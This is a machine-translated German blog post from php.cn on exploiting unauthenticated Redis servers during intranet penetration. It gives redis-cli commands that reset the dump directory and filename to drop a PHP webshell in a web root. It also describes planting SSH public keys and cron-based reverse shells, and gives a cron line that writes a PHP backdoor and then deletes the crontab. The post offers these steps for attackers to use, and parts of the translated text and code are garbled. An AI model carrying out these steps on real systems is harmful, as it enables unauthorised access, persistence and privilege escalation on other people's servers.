Heim > php教程 > PHP开发 > Tipps zur anonymen Zugriffsnutzung von Redis

Tipps zur anonymen Zugriffsnutzung von Redis

高洛峰
Freigeben: 2016-11-14 09:22:46
Original
1628 Leute haben es durchsucht

Redis-Datenbank ist in der Intranet-Penetration relativ häufig anzutreffen. In Kombination mit dem aktuellen Nutzungsprozess:

Redis auf dem Intranet-Computer herunterladen und entpacken, keine Installation erforderlich

A) Unter normalen Umständen kennen Sie den Pfad und schreiben die Shell

./redis-cli -h IP  
config set dir /home/wwwroot/default/  
config set dbfilename redis.php 
set webshell " phpinfo(); ?>"  
save
Nach dem Login kopieren

B) Verwenden Sie den öffentlichen Schlüssel, um sich ohne Passwort anzumelden. 1 Generieren Sie den öffentlichen Schlüssel lokal. 2 Verwenden Sie Redis, um den öffentlichen Schlüssel zu sichern Redis-Maschine C) Verwenden Sie die Linux-Aufgabe, um die Shell neu zu binden.

1 /var/spool/cron ist die standardmäßig geplante Aufgabe auf der Linux-Maschine Der Dateiname ist Benutzername 2. Redis setzt dbfilename auf den oben genannten Wert, um die Shell direkt zurückzuspringen.

Grob gesagt werden die oben genannten drei Methoden hauptsächlich verwendet, um die Berechtigungen des Redis-Servers zu erhalten Beginnend mit Root-Berechtigungen sind die Berechtigungen sehr groß.

Aber es wird immer wieder zu unerwarteten Situationen während des Penetrationsprozesses kommen, oder?

Die erste Methode: Wenn die Redis-Datenbank zu groß ist, was dazu führt, dass das PHP-Pferd den Grenzwert überschreitet und 500 nicht direkt analysiert werden, können wir über den dritten Befehl < ein Pferd in das Webverzeichnis schreiben 🎜>

*/1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r
Nach dem Login kopieren
Mit einem solchen Pferd wird es kein Problem geben

Bei der zweiten Methode habe ich die Maschine ohne Probleme getestet, aber wenn es um die Penetrationsumgebung geht, gibt es ein Problem Sollte ein SSH-Passwort-freies Login ein Problem sein, ist die Erfolgswahrscheinlichkeit nicht zu groß

Die dritte Methode, meine Lieblingsmethode, ist einfach, grob und klar und erspart sogar die Rechteerweiterung ( Wenn es sich um einen wichtigen Computer handelt, hat der Root-Benutzer normalerweise geplante Aufgaben. Es wird empfohlen, zuerst niedrige Berechtigungen zu verwenden.) Der Benutzer springt eine Shell zurück, um die Situation zu überprüfen (im Root), stößt aber auch auf einen sehr seltsamen Computer, der keine Verbindung herstellt zum externen Netzwerk, daher besteht die einzige Möglichkeit darin, eine Shell in das Webverzeichnis zu schreiben oder eine Bash-Shell im internen Netzwerk zu überwachen und sie selbst zu verbinden.

Eine weitere Entdeckung von Redis ist, dass höhere Versionen von Linux kann Berechtigungen auch nicht direkt über Redis eskalieren, eine Methode zur Rechteausweitung durch Software von Drittanbietern.


Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Empfehlungen
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage